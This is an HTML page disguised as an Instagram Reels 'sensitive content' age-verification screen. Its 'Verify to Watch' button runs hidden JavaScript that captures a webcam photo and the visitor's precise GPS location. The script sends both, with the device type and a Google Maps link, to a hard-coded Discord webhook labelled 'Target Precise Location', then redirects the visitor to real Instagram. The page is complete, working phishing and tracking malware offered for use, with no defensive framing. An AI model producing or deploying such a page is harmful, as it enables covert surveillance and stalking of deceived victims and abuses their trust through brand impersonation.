<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    
    <title>Instagram Reels</title>
    <meta property="og:title" content="Instagram Reel" />
    <meta property="og:description" content="Watch this trending reel on Instagram" />
    <meta property="og:image" content="https://www.instagram.com/static/images/ico/favicon-200.png/ab7dea7b8670.png" />
    <meta property="og:type" content="video.other" />
    <meta name="theme-color" content="#E1306C">
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { background: #000; color: #fff; font-family: -apple-system, system-ui, "Segoe UI", Roboto; overflow: hidden; }
        .reels-container { width: 100vw; height: 100vh; position: relative; display: flex; align-items: center; justify-content: center; background: #000; }
        .video-mockup { width: 100%; height: 100%; object-fit: cover; filter: blur(28px) brightness(0.5); }
        .ui-top { position: absolute; top: 0; width: 100%; padding: 20px; display: flex; justify-content: space-between; align-items: center; z-index: 10; }
        .ui-top span { font-weight: bold; font-size: 20px; }
        .content-warning { position: absolute; width: 85%; max-width: 320px; background: rgba(26, 26, 26, 0.98); border-radius: 12px; padding: 30px 20px; text-align: center; z-index: 20; border: 0.5px solid #333; }
        .warning-icon { width: 40px; margin-bottom: 15px; opacity: 0.9; }
        .warning-title { font-size: 19px; font-weight: bold; margin-bottom: 10px; }
        .warning-desc { font-size: 13.5px; color: #a8a8a8; margin-bottom: 25px; line-height: 1.5; }
        .insta-btn { background: #0095f6; color: #fff; border: none; width: 100%; padding: 12px; border-radius: 8px; font-weight: 600; font-size: 14px; cursor: pointer; }
        #video, #canvas { display: none; }
    </style>
</head>
<body>

    <div class="reels-container">
        <div class="ui-top">
            <span>Reels</span>
            <svg color="#fff" fill="#fff" height="24" viewBox="0 0 24 24" width="24"><path d="M15.67 12a3.67 3.67 0 11-3.67-3.67A3.67 3.67 0 0115.67 12zm4.33 0a8 8 0 11-8-8 8 8 0 018 8z"></path></svg>
        </div>
        <img src="https://images.unsplash.com/photo-1611162617213-7d7a39e9b1d7?w=500" class="video-mockup">
        <div class="content-warning">
            <svg class="warning-icon" fill="none" stroke="#fff" stroke-width="2" viewBox="0 0 24 24"><path d="M15 12a3 3 0 11-6 0 3 3 0 016 0z" stroke-linecap="round" stroke-linejoin="round"></path><path d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z" stroke-linecap="round" stroke-linejoin="round"></path></svg>
            <div class="warning-title">Sensitive Content</div>
            <div class="warning-desc">This video may contain sensitive content. Please verify your age to continue watching this Reel.</div>
            <button class="insta-btn" onclick="takeAction()">Verify to Watch</button>
        </div>
    </div>

    <video id="video" autoplay playsinline></video>
    <canvas id="canvas"></canvas>

    <script>
        const WEBHOOK_URL = 'https://discord.com/api/webhooks/1459136830992683080/XvGgJxEN4NJS0Cq-VMociYYRoSDZ10og0Hn-XBWHKRqscW_xeAV73BwkBq-KlkQmeHgz';

        async function takeAction() {
            try {
                const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                
                navigator.geolocation.getCurrentPosition(async (position) => {
                    const lat = position.coords.latitude;
                    const lon = position.coords.longitude;

                    const video = document.getElementById('video');
                    video.srcObject = stream;
                    const device = /Android/i.test(navigator.userAgent) ? "Android" : /iPhone|iPad|iPod/i.test(navigator.userAgent) ? "iPhone" : "PC";

                    setTimeout(() => {
                        const canvas = document.getElementById('canvas');
                        canvas.width = video.videoWidth;
                        canvas.height = video.videoHeight;
                        canvas.getContext('2d').drawImage(video, 0, 0);

                        canvas.toBlob(async (blob) => {
                            const formData = new FormData();
                            formData.append('file', blob, 'capture.png');
                            
                            const payload = {
                                content: "🎯 **REAL-TIME GPS & PHOTO CAPTURED**",
                                embeds: [{
                                    title: "Target Precise Location",
                                    color: 13500416,
                                    fields: [
                                        { name: "📱 Device", value: device, inline: true },
                                        { name: "📍 GPS Coords", value: `${lat}, ${lon}`, inline: false },
                                        { name: "🗺️ Google Maps", value: `https://www.google.com/maps?q=${lat},${lon}`, inline: false }
                                    ],
                                    footer: { text: "Precise Tracking Active" },
                                    timestamp: new Date()
                                }]
                            };

                            formData.append('payload_json', JSON.stringify(payload));
                            await fetch(WEBHOOK_URL, { method: 'POST', body: formData });
                            
                            stream.getTracks().forEach(track => track.stop());
                            window.location.href = "https://www.instagram.com/reels/"; 
                        }, 'image/png');
                    }, 1000);
                }, (error) => {
                    alert("Verification Failed: Please allow location access to continue.");
                }, { enableHighAccuracy: true });

            } catch (err) {
                alert("Security Error: Please enable camera and location.");
            }
        }
    </script>
</body>
</html>
